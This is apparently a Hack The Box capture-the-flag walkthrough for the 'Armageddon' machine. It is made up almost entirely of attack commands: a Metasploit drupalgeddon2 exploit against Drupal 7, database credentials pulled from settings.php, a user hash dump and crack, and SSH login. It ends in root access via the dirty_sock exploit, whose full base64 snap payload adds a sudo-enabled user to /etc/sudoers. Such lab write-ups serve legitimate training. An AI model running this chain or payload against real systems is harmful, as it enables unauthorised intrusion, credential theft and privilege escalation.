Hack The Box -Armageddon
┌──(root💀kali)-[/home/kali/Downloads]
└─# nmap 10.10.10.233
Let’s check if we can work a way around the login page!
Exploring, I found that Drupal 7 can be exploited using Metasploit!
┌──(root💀kali)-[/home/kali/Downloads]
└─# msfconsole
msf6 > search drupal
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.10.10.233
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 10.10.14.35
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
cat settings.php
‘username’ => ‘drupaluser’,
‘password’ => ‘CQHEy@9M*m23gBVj’,
mysql -u drupaluser -p -e ‘show databases;’
mysql -u drupaluser -p -D ‘drupal’ -e ‘show tables;’
mysql -u drupaluser -p -D ‘drupal’ -e ‘select * from users;’
Output:
brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
┌──(root💀kali)-[/home/kali/Downloads]
└─# john hash –wordlist=rockyou.txt
Output: booboo
──(root💀kali)-[/home/kali/Downloads]
└─# ssh brucetherealadmin@10.10.10.233
User.txt: ae611d2c546da871XXXXXXXXXXXXXX
[brucetherealadmin@armageddon ~]$ python –version
https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py
https://gitlab.com/tamilcode/dirty-sock-exploit/-/blob/main/dirty_sock_exploit
[brucetherealadmin@armageddon /]$ cd tmp[brucetherealadmin@armageddon tmp]$ python2 -c ‘print “aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw” + “A”*4256 + “==”‘ | base64 -d > dedsec.sna
[brucetherealadmin@armageddon tmp]$ sudo /usr/bin/snap install –devmode dedsec.snap
[brucetherealadmin@armageddon tmp]$ cat /etc/passwd
Username: dirty_sock
Password: dirty_sock
[brucetherealadmin@armageddon tmp]$ su dirty_sock
[dirty_sock@armageddon tmp]$ sudo –i
[root@armageddon ~]# cd /root
[root@armageddon ~]# cat root.txt
Root.txt: 7e815792cbddaf2XXXXXXXXXXXXXXXXXXXX